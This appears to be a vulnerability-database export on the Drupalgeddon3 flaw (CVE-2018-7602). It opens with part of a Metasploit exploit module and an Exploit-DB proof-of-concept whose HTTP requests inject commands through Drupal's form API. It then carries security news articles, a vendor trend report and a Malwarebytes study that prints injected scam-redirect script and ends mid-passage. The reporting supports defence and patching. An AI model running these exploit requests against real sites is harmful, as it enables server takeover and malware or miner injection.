'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\r\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n\r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def start_exploit\r\n drupal_node = datastore['DRUPAL_NODE']\r\n res = send_request_cgi({\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\r\n })\r\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form -> #{form_token}\\n\"\r\n r2 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\r\n 'vars_post' => {\r\n 'form_id' => 'node_delete_confirm',\r\n '_triggering_element_name' => 'form_id',\r\n 'form_token'=> \"#{form_token}\"\r\n }\r\n })\r\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\r\n r3 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\r\n 'vars_post' => {\r\n 'form_build_id' => \"#{form_build_id}\"\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n start_exploit\r\n else\r\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\r\n end\r\n end\r\n end", "sourceHref": "https://www.exploit-db.com/download/44557", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T08:14:38", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["2018-7602", "CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "EDB-ID:44542", "href": "https://www.exploit-db.com/exploits/44542", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n\r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n\r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n\r\nRetrieve the form_build_id from the response, and then triggering the exploit with : \r\n\r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n\r\nThis will display the result of the whoami command.\r\n\r\nPatch your systems!\r\nBlaklis", "sourceHref": "https://www.exploit-db.com/download/44542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2019-01-27T14:50:26", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress ](<https://wordpress.org/plugins/>)_official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_[ ](<https://en.wikipedia.org/wiki/WordPress>)(see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>) _popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) _('23-mar' bar in Figure 10 below), and _[CVE-2018-7602 ](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_('25-apr' bar below, also known as _[Drupalgeddon2 ](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs ](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-09T14:00:26", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2022-05-09T12:40:35", "description": "[](<https://thehackernews.com/images/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s728-e100/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it's the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. \n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://thehackernews.com/images/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s728-e100/drupal.png>)\n\n \nSince the previously disclosed flaw derived much attention and motivated attackers to target websites running over Drupal, the company has urged all website administrators to install new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied patches for Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, can be named **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. \n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T16:41:00", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T11:04:51", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:34", "description": "[](<https://thehackernews.com/images/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s728-e100/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. \n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete take over of affected websites. \n \nAlthough Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) derived much attention, which eventually allowed attackers actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer it **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://thehackernews.com/images/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s728-e100/drupal-exploit-code.png>)\n\n \nThe exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. \n \nDrupalgeddon3 resides due to the improper input validation in Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass though stripDangerousValues() function that filters \"#\" character and can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the Unicode version for \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. \n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T12:32:00", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T12:32:45", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer of Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages\u2014a typical approach for unveiling tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of 